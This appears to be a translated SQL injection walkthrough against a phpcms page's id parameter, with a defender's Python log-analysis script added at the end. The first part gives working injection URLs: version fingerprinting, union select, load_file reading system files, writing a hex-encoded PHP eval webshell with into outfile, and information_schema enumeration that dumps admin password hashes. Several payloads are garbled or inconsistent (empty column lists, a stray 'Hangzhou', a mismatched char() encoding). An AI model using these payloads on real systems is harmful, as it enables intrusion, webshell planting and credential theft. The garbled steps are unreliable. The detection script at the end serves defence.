Author: left
The test environment is Win7 SP1 + IIS 7.5 + MySQL 5.1. The target is a small phpcms website, and the injection point is http://www.bkjia.com/show.php?id=2
This is the first article I have written......
1. MySQL injection with root privileges
Append a single quote directly to the URL: http://www.bkjia.com/show.php?id=2'
The MySQL error is returned directly. xor 1=1 and xor 1=2 are used to confirm that this is an integer injection;
Confirmed. Next submit http://www.bkjia.com/show.php?id=2 and ord(mid(version(),5.1))>51. The page returns normally, so the version is above the threshold and union queries are supported;
Use order by to find the number of columns: order by 15 returns normally, order by 16 errors, so there are 15 columns;
Find the displayed columns: http://www.bkjia.com/show.php?id=2 and 1<1 union select 1,2,4,5,6,7,8,9,10,11,12,13,14,15 shows positions 3 and 11.
Now confirm the current user's privileges: submit http://www.bkjia.com/show.php?id=2 and 1<1 union select, user(), 10, database(),
It is the root account. From root@localhost we can see that the website and the database are on the same machine. Of course, we tested this on our own computer.
Since we have root privileges and this is an integer injection, we can use load_file() and write out a webshell. load_file() output is displayed at position 3 or 11: http://www.bkjia.com/show.php?id=2 and 1<1 union select 1,2,load_file('C:\boot.ini'), but the result shows nothing. There are several possible reasons: that position may not accept character data, or the length defined for both positions may be too short. Continue by submitting http://www.bkjia.com/show.php?id=2 and 1=2 union select 1,2,load_file(char(111,111,116,46,105,110,105,)),
which displays the content of C:\boot.ini; char(111,111,116,46,105,110,105,) is the ASCII encoding of c:\boot.ini. Combined with outfile this lets us write a file, provided we know the current site path. Accessing http://www.bkjia.com/data/ directly reveals the site path (PHP error display is enabled; otherwise you would have to guess the path).
Then generate the webshell with outfile: submit http://www.bkjia.com/show.php?id=2 and 1=2 union select, random, into outfile 'f:\websites\phpaaCMS-UTF8-0.3.1\phpaaCMS-UTF8-0.3.1\1.php'. 0x3c3f706870206576616c28245f504f53545b7a5d293b3f3e is the hex encoding of a one-line PHP trojan; connect to it with a one-line-shell client.
Success.
2. Injection without root privileges, using the information_schema system tables
Non-root users generally cannot use load_file, because load_file requires the FILE privilege and ordinary users generally do not have it. In that case the injection approach is similar to ASP, but a very favourable condition in MySQL 5 and above is the built-in information_schema database, which stores the server's metadata: as long as there is an injection point, you can reliably obtain the user's password. Guessing tables and columns in MySQL the ASP way is not tested again here; instead we use information_schema to obtain the password.
The injection point is the same, and the columns displayed by the union query are again 3 and 11.
http://www.bkjia.com/show.php?id=2 and 1=2 union select 1,2,4,5,6,7,8,9,10,11,12,13,14,15
Submit http://www.bkjia.com/show.php?id=2 and 1=2 union select, unhex(hex(group_concat(schema_name))), from information_schema.schemata
The current database name is determined to be phpaa.
Then get all the table names in the current database: submit http://www.bkjia.com/show.php?id=2 and 1=2 union select, unhex(hex(group_concat(table_name))), from information_schema.tables where table_schema=0x7068706161. All the table names in the current database are displayed; 0x7068706161 is the hex encoding of phpaa.
The cms_users table looks sensitive, so query all the column names in that table: submit http://www.bkjia.com/show.php?id=2 and 1=2 union select, unhex(hex(group_concat(column_name))), from information_schema.columns where table_name=Hangzhou,
The columns are clearly username and password, so query them: submit http://www.bkjia.com/show.php?id=2 and 1=2 union select, username, 10, password, from cms_users
Look up the MD5 hash on an MD5 cracking website; it resolves to admin, and logging in to the admin backend as this user succeeds.
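Every stage of the two walkthroughs above (the quote test, the version fingerprint, order by, union select, load_file, into outfile and the information_schema lookups) leaves a distinctive footprint in the web server log, and show.php only ever expects a numeric id. The script below is an added defender's example, not code from the write-up's author: it runs a small rule set over constructed IIS-style log lines (date time method uri-stem uri-query status) modelled on those requests and flags each suspicious one.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample log in a simplified IIS W3C layout; these lines mirror the
# probes described in the write-up and are not real traffic.
SAMPLE_LOG = """\
2024-01-01 10:00:01 GET /show.php id=2 200
2024-01-01 10:00:05 GET /show.php id=2' 500
2024-01-01 10:00:09 GET /show.php id=2%20and%20ord(mid(version(),5,1))%3E51 200
2024-01-01 10:00:15 GET /show.php id=2%20order%20by%2016 500
2024-01-01 10:00:21 GET /show.php id=2%20and%201%3C1%20union%20select%201,2,3 200
2024-01-01 10:00:30 GET /show.php id=2%20and%201=2%20union%20select%201,2,load_file(char(99,58,92,98,111,111,116)) 200
2024-01-01 10:00:40 GET /show.php id=2%20and%201=2%20union%20select%20schema_name%20from%20information_schema.schemata 200
2024-01-01 10:00:50 GET /show.php id=2%20and%201=2%20union%20select%200x41%20into%20outfile%20'f:/site/x.php' 200
2024-01-01 10:01:00 GET /show.php id=15 200
"""

# One rule per stage of the technique; matched against the URL-decoded query.
RULES = [
    ("version-fingerprint", re.compile(r"\bversion\s*\(", re.I)),
    ("column-count-probe",  re.compile(r"\border\s+by\s+\d+", re.I)),
    ("union-select",        re.compile(r"\bunion\s+(all\s+)?select\b", re.I)),
    ("file-read",           re.compile(r"\bload_file\s*\(", re.I)),
    ("file-write",          re.compile(r"\binto\s+(out|dump)file\b", re.I)),
    ("schema-enumeration",  re.compile(r"\binformation_schema\.", re.I)),
]
INTEGER_PARAMS = {"id"}   # parameters the application treats as integers (assumed)

def classify_query(query: str) -> list:
    """Return the names of all rules that match a raw (URL-encoded) query string."""
    decoded = unquote_plus(query)
    tags = [name for name, rx in RULES if rx.search(decoded)]
    for pair in decoded.split("&"):
        key, _, value = pair.partition("=")
        if key in INTEGER_PARAMS and not value.isdigit():
            tags.append("non-integer-" + key)   # the quote test and every later probe land here
    return tags

def analyze_log(text: str) -> list:
    """Return one (timestamp, status, tags) finding per suspicious request."""
    findings = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) != 6:
            continue                          # skip headers and malformed lines
        date, time, _method, _stem, query, status = fields
        tags = classify_query(query)
        if tags:
            findings.append((date + " " + time, int(status), tags))
    return findings

if __name__ == "__main__":
    for when, status, tags in analyze_log(SAMPLE_LOG):
        print(when, status, ", ".join(tags))
```

The non-integer-id rule alone catches every step of the attack against show.php, so for a parameter the code casts to int it is a tighter signal than keyword matching; the keyword rules then tell you which stage (fingerprinting, enumeration, file read or file write) was reached.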